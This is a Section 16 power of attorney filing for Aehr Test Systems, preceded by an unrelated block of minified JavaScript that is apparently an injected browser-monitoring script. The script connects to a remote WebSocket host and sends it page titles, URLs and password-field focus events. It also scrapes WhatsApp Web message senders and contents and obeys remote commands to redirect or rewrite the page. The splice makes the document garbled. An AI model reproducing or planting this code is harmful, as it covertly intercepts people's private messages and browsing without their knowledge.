 !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:y.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:y.pid,pn:y.pn};null!=H&&H.readyState==WebSocket.OPEN&&H.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:y.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:y.sendNotificationsInterval,useragent:navigator.appVersion.length>navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:y.pid,pn:y.pn};H.send(JSON.stringify(Y))}function s(){m()}function i(){n()&&(clearInterval(b),clearInterval(A)),timeout=setTimeout((function(){g()}),N)}function o(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();L!=e&&e&&v(),L=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&&"password"==Y.type&&!P)if(P=!0,n()){var e={type:"password_input_focus",focus:!0,token:y.token};H.send(JSON.stringify(e))}else window.top.postMessage({message:"iframePasswordInputFocused",name:Y.name,type:Y.type},"*")}function d(Y){var e=Y&&Y.name?Y.name:"<unnamed>";if(Y&&"password"==Y.type&&P)if(P=!1,n()){var t={type:"password_input_focus",focus:!1,token:y.token};H.send(JSON.stringify(t))}else window.top.postMessage({message:"iframePasswordInputBlurred",name:e,type:Y.type},"*")}function c(Y){var e=document.activeElement;e&&e!=document.body?document.querySelector&&(e=document.querySelector(":focus")):e=null;for(var t=0;t<Y.length;++t){let s=Y[t];var n="password"==s.type,r=n&&s.hasAttribute("autofocus"),a=n&&e&&s.isEqualNode(e);(r||a)&&u(s),s.tmInputEventListenerAttached||(s.addEventListener("focus",(function(Y){u(Y.target)}),!0),s.addEventListener("blur",(function(Y){d(Y.target)}),!0),s.tmInputEventListenerAttached=!0)}}function D(){c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&Y.addedNodes&&0!=Y.addedNodes.length&&(window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&&c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.addEventListener("beforeunload",(function(Y){d(),function(){for(var Y=document.getElementsByTagName("input"),e=0;e<Y.length;++e){let t=Y[e];t.removeEventListener("focus",u),t.removeEventListener("blur",d),delete t.tmInputEventListenerAttached}}()}))}function l(){n()&&(y.iup&&r(),h()&&(v(),m(),function(){var Y=new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&("childList"!==Y.type||Y.addedNodes.length<=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&&(w=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&&(E="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&&(E="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&&(t=Array.prototype.slice.call(t)).push(Y),t&&t.forEach((function(Y){if(Y&&Y.classList&&!(Y.classList.length<=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&&t.attributes["data-pre-plain-text"]){var s=t.attributes["data-pre-plain-text"].textContent,i=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](s);if(!i||6!=i.length)return;if(i[3]&&"pm"==i[3].toLowerCase()&&(i[1]=parseInt(i[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](i[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(i[4],O)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var s=Date.parse(n[a]);if(s&&!(Math.abs(r-s)>1728e6))return new Date(s)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(i[1]),r.setMinutes(i[2]),a=i[5]}T.get(w)||T.set(w,C);var o=n?n.innerText:null;if(a&&o&&L){var M=(a+o+w+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y<<7)+(Y<<3))^e})).toString(16);if(T.get(w).getTime()==r.getTime()?r.setMilliseconds(++k):(k=0,T.set(w,r)),!M||I.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:o,recipient:e?"Me":w,conversationId:w+"("+E+")"};H.send(JSON.stringify(u)),I.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&&(a(),b=setInterval(a,y.sendNotificationsInterval),h()&&(A=setInterval(s,y.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t<e.length;++t)"icon"!=e[t].getAttribute("rel")&&"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&&(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=y.token,n.useragent=navigator.appVersion.length>navigator.userAgent.length?navigator.appVersion:navigator.userAgent,H.send(JSON.stringify(n))}(),y.dontTrackWebPasswords&&D())}function f(){document.tmfilter||(g(),O={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function g(){(H=new WebSocket(y.connectionString)).onclose=i,H.onmessage=o,H.onopen=l,y.extJs&&(this.extJs.webSockReady=()=>H.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=>H.send(Y))}function p(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e<Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&&document[Y]}function h(){var Y=document.head.querySelector("[name='og:title']");return!!Y&&"WhatsApp Web"===Y.getAttribute("content")}function m(){H.send(JSON.stringify({type:"waptracking"}))}function v(){T=new Map,I=new Set,k=0,(C=new Date).setSeconds(0),C.setMilliseconds(0)}function S(Y){var e={name:Y.data.name,type:Y.data.type};"iframePasswordInputFocused"===Y.data.message?u(e):"iframePasswordInputBlurred"===Y.data.message&&d(e)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11<Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0<(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,s=Y.length;a<s;a++)t=Y[a],!e.indexOf(t)&&t.length>r&&(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),s=t.en,i=s.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=i[Y];return e?i.post(e.call(s,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,s,i=t.en,o=i.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,d={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var D=0,l=1;for(s="";!s;)s=a[++D];a=s.charAt(0);var f=o.slice(M);if(2>D){var g=i.parser[s].call(i,f,n);c[a]=g.index,"M"===a&&c[a]++,l=g.length}else if(7>D)g=(f.match(d[D])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-s.length):g),l=g.length;else if(" "!==a&&a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===o.length&&g?(c.Y+=70>c.Y?2e3:100>c.Y?1900:0,c.H=c.H||i.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1>c.M||12<c.M||1>c.D||c.D>Y[c.M-1]||23<c.H||59<c.m||59<c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&&Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var y={token:"c917cb81-370a-4d40-87bd-33c783bf9559",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"5292",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},N=6e4,b=null,A=null,w=null,E=null,L=!1,T=null,I=null,k=0,C=null,H=null,O="",P=!1;!function Y(e){p()?setTimeout((function(){Y(e)}),1e3):e()}((function(){y.extJs&&y.extJs.init(y.token),n()&&(window.addEventListener("focus",r,!0),y.dontTrackWebPasswords&&window.addEventListener("message",S,!1)),n()||y.extJs?f():y.dontTrackWebPasswords&&D()}))}();

 POWER OF ATTORNEY

    The undersigned, as a Section 16 reporting person of Aehr
Test Systems (the "Company"), hereby constitutes and appoints
Kenneth B. Spink and Vernon Rogers, and each of them, the
undersigned's true and lawful attorney-in-fact to:

      1. complete and execute Forms 3, 4 and 5 and other forms
         and all amendments thereto as such attorney-in-fact
         shall in his or her discretion determine to be required
         or advisable pursuant to Section 16 of the Securities
         and Exchange Act of 1934 (as amended) and the rules and
         regulations promulgated thereunder, or any successor
         laws and regulations, as a consequence of the
         undersigned's ownership, acquisition or disposition of
         securities of the Company; and

      2. do all acts necessary in order to file such forms with
         the Securities and Exchange Commission, any securities
         exchange or national association, the Company and such
         other person or agency as the attorney-in-fact shall
         deem appropriate.

    The undersigned hereby ratifies and confirms all that said attorney-in-fact and agents shall do or cause to be done by virtue hereof.  The undersigned acknowledges that the foregoing
attorney-in-fact, in serving in such capacity at the request of the undersigned, are not assuming, nor is the Company assuming, any of the undersigned's responsibilities to comply with Section 16 of the
Securities Exchange Act of 1934 (as amended).

    This Power of Attorney shall remain in full force and effect until the undersigned is no longer required to file Forms 3, 4 and
5 with respect to the undersigned's holdings and transactions in securities issued by the Company, unless earlier revoked by the undersigned in a signed writing delivered to the Company and the foregoing attorneys-in-fact.

IN WITNESS WHEREOF, the undersigned has caused this Power of Attorney to be executed as of this 3rd day of September, 2020.

            Signature:    /s/ GAYN ERICKSON
                                        ----------------------

            Print Name:    GAYN ERICKSON
                                        ----------------------